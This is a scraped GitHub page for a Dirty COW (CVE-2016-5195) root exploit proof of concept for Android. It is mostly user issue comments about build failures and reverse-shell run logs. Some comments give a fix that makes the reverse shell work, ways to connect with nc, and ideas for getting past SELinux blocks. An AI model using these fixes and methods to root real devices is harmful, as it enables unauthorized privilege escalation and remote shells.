hyln9 / vikiroot Goto Github PK
View Code? Open in Web Editor NEWCVE-2016-5195 (Dirty COW) PoC for Android 6.0.1 Marshmallow
License: GNU General Public License v3.0
CVE-2016-5195 (Dirty COW) PoC for Android 6.0.1 Marshmallow
License: GNU General Public License v3.0
.just send string between terminal .
how can use nc?
如题,是否可以支持4.x和5.x?
jni/exploit.c:43:21: fatal error: payload.h: No such file or directory
#include "payload.h"
After downloading the repository and running make all
, I get the output
exploit.o: In function `ptrace_thread':
exploit.c:(.text+0x160): undefined reference to `stderr'
exploit.c:(.text+0x164): undefined reference to `stderr'
exploit.c:(.text+0x1a4): undefined reference to `stderr'
exploit.c:(.text+0x1a8): undefined reference to `stderr'
exploit.c:(.text+0x24c): undefined reference to `stderr'
exploit.o:exploit.c:(.text+0x250): more undefined references to `stderr' follow
collect2: error: ld returned 1 exit status
Makefile:13: recipe for target 'exploit' failed
make: *** [exploit] Error 1
I ran the make command just as I downloaded it. I only had to change the Makefile in order to add absolute paths to the NDK binaries as they weren't in my PATH.
Probably fault of Android NDK, but I cannot get VIKIROOT working at all...
thanks for your poc ,@hyln9 ,It's interesting!
when i execute the poc on my phone ,i get the informatin as follows:
shell@shamu:/data/local/tmp $ ./exploit 1234
Reverse shell target: 127.0.0.1:1234
Exploit process starts.
Inject: patch 1/2
Inject: patch 2/2
Please wake up you phone now.
Waiting for reverse connect shell.
#!but now,i don't know how to get the reverse shell and i also want to know how to connect the shell by nc ,can you tell me about that,thanks!
What exactly does "payload.s", is this "payload.h", am I right? How to compile this, help me please.
Sir,
I am trying to build your code it give me an error like this
"aarch64-linux-android-objcopy : payload.o:Invalid bfd target"
Is there anything i need to install before start compilation
Thanks
compiled the latest source code, builds fine yet doesnt work (ZTE blade blitz x64), set permissions 777 and execute ./exploit but nothing happens.
Also happy to test on nougat
As described in the Bugs section here, some versions of libc have a bug where getpid()
in a clone()
d thread will return the parent PID rather than the child. (That page says CLONE_VM
prevents it, but guess what, it happened anyway!)
Really lazy fix is:
#include <sys/syscall.h>
#define getpid() syscall(SYS_getpid)
After that, the reverse shell works.
D:\Program Files (x86)\Android\android-sdk\platform-tools>adb shell /data/local/
tmp/exploit
/system/bin/sh: /data/local/tmp/exploit: can't execute: Permission denied
D:\Program Files (x86)\Android\android-sdk\platform-tools>adb shell sh /data/loc
al/tmp/exploit
/data/local/tmp/exploit[1]: syntax error: '(' unexpected
D:\Program Files (x86)\Android\android-sdk\platform-tools>
I download the code and when laun make get this:
/opt/android-ndk-r15c-linux-x86_64//toolchains/aarch64-linux-android-4.9/prebuilt/linux-x86_64/bin/aarch64-linux-android-as -o payload.o payload.s
/opt/android-ndk-r15c-linux-x86_64//toolchains/aarch64-linux-android-4.9/prebuilt/linux-x86_64/bin/aarch64-linux-android-objcopy -O binary payload.o payload xxd -i payload payload.h
/opt/android-ndk-r15c-linux-x86_64/ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=x86_64 APP_PLATFORM=android-23
make[1]: Entering directory /root/VIKIROOT
[x86_64] Compile : vikiroot <= exploit.c
./exploit.c:90:27: warning: duplicate 'const' declaration specifier [-Wduplicate-decl-specifier] static const struct entry const entry_db[] = { ^ 1 warning generated.
[x86_64] Executable : vikiroot
[x86_64] Install : vikiroot => libs/x86_64/vikiroot
make[1]: Leaving directory /root/VIKIROOT
I've tried to do it manual push the executable inside the devie and make the chmod and launch the exploit and receive this again:
Reverse shell target: 127.0.0.1:1337
Internal error: insufficient place for payload.
What could be happend?
I'm using the LS991 (LG G4 US-Sprint variant) on MM. On localhost, I can at least get it to run, and wait for a remote shell. Using Termux on the device and nc to try to connect to the shell, I get nothing. Specifying an ip in my local subnet (192.168.254.x), to which the device is connected via wifi, the device completely reboots.
What am I doing wrong, or is this by design unable to function this way?
i runt the exploit on nexus 6p android 7.1.1 but it stuck on
"Waiting for reverse connect shell"
I try it on Samsung galaxsy s7 with N (7.0). it is looks like nothing is happend.
I test the poc on android 6.0.1 , it success. but on android 6.0, it failed ?
Have you tested it on android 6.0 ?
On LG G4 with Android 6.0, the exploit works (code is running under init process), but fails to connect the shell due to selinux (connect() returns -EACCES). I've been toying with other methods (exec a shell script, open /dev/pts/n) but so far nothing. (I might be doing the /dev/pts part wrong?)
timwr's method (replacing run-as) does spawn a shell, but in a more limited context. Ideally I want a shell in init context, or some other that has more access.
Any other ideas to get around selinux blocking sockets?
I download your poc,and compile it by ndk,but,when i execute it on phone,it failed as follows:
Reverse shell target: 127.0.0.1:1111
Exploit process starts.
Inject: patch 1/2
[2] + Stopped (signal) ./exploit 1111
my Android.mk's content is :
LOCAL_MODULE := exploit
LOCAL_CFLAGS := -Os -fPIE -Wall
LOCAL_SRC_FILES := exploit.c
LOCAL_LDFLAGS := -pthread -s -pie -Wall
could you tell me why? thanks
i compiled using aarch64-linux-gnu-gcc
for my android
but after in android when i try to execute it wont work.
getting error No such file or directory
请问有编译好的版本吗?方便留个联系方式吗?
Most armv7a (non-64bit) devices do not have VDSO enabled. Any suggestions on what might be the other places to inject?
>>> Reverse shell target: 127.0.0.1:4333
>>> Exploit process starts.
>>> Inject: patch 1/2
>>> Inject: patch 2/2
>>> Please wake up you phone now.
>>> Waiting for reverse connect shell.
>>> Enjoy!
====================TERMINAL====================
====================TERMINAL====================
>>> Restore process starts.
>>> Remove: patch 2/2
>>> Remove: patch 1/2
>>> Removing .x file.
In case of write remainder. All data you have in 'src' array already. Just correct both ptrs and write whole word.
thanks for your poc!
i test it on my phone(huawei P9, android 6.0).
but it does nothing , are you test it on huawei phone, is it use vdso?
When I try your root method, I can get to the terminal on 7.0 Nougat using Termux, but root has not been achieved.
whoami
u0_a211
Also, when I run certain programs (such as mount), I get this error on the phone:
CANNOT LINK EXECUTABLE "/system/bin/mount": cannot locate symbol "OpenSSL_add_all_algorithms" referenced by "/system/lib64/libselinux.so"...
Is this a problem with the program, or that I'm on 7.0 (I'm running this on an AT&T S7)?
step 1 :
i use wireless adb connect device
`adb connect 192.168.11.128
`$ ./exploit 5678
Reverse shell target: 127.0.0.1:9999
Exploit process starts.
Inject: patch 1/2
Inject: patch 2/2
Please wake up you phone now.
Waiting for reverse connect shell.
Enjoy!
====================TERMINAL====================
����host::features=cmd,stat_v2,shell_v2`
step 2:
adb connect 192.168.11.128:9999
adb shell error: device offline
try to reconnect
adb connect 192.168.11.128:9999 already connected to 192.168.11.128:9999
_MY device is SAMSUNGS7 and api is 7.0. i want shell.. please let me know your facebook or please contact me. my email is [email protected]
here is my problem.
android adb(192.168.17.12) || linux shell(192.168.17.39)
./exploit 2222
Reverse shell target: 127.0.0.1:2222
Exploit process starts.
Inject: patch 1/2
Inject: patch 2/2
Please wake up you phone now.
Waiting for reverse connect shell.
|| nc 192.168.17.12 2222
Enjoy!
======TERMINAL=====
|| asjdkasjkd
asjdkasjkd
||123
123
||ls <- command but it just send to string..
ls
======TERMINAL=====
Restore process starts.
Remove: patch 2/2
Remove: patch 1/2
Removing .x file._
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.